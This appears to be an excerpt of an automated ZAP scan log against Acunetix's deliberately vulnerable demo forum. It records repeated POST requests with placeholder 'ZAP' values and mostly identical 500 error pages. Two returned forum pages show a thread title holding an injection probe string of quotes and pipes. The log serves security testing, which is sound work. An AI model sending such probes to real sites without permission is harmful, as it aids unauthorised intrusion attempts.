HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 513 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3059 |
Response Body - size: 3,059 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 12345'"\'\");|]* </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/12345'"\'\");|]* </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>12345'"\'\");|]* - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
